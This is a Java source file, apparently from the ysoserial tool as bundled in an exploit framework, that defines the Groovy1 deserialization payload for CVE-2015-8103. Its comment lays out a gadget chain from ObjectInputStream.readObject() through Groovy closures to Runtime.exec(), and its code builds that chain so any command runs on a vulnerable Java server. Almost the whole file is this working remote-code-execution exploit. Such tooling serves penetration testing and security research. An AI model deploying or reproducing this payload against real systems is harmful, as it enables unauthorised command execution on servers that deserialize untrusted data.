Path: blob/master/external/source/exploits/CVE-2015-8103/payloads/Groovy1.java
19715 views
package ysoserial.payloads;12import java.lang.reflect.InvocationHandler;3import java.util.Map;45import org.codehaus.groovy.runtime.ConvertedClosure;6import org.codehaus.groovy.runtime.MethodClosure;78import ysoserial.payloads.annotation.Dependencies;9import ysoserial.payloads.util.Gadgets;10import ysoserial.payloads.util.PayloadRunner;1112/*13Gadget chain:14ObjectInputStream.readObject()15PriorityQueue.readObject()16Comparator.compare() (Proxy)17ConvertedClosure.invoke()18MethodClosure.call()19...20Method.invoke()21Runtime.exec()2223Requires:24groovy25*/2627@SuppressWarnings({ "rawtypes", "unchecked" })28@Dependencies({"org.codehaus.groovy:groovy:2.3.9"})29public class Groovy1 extends PayloadRunner implements ObjectPayload<InvocationHandler> {3031public InvocationHandler getObject(final String command) throws Exception {32final ConvertedClosure closure = new ConvertedClosure(new MethodClosure(command, "execute"), "entrySet");3334final Map map = Gadgets.createProxy(closure, Map.class);3536final InvocationHandler handler = Gadgets.createMemoizedInvocationHandler(map);3738return handler;39}4041public static void main(final String[] args) throws Exception {42PayloadRunner.run(Groovy1.class, args);43}44}454647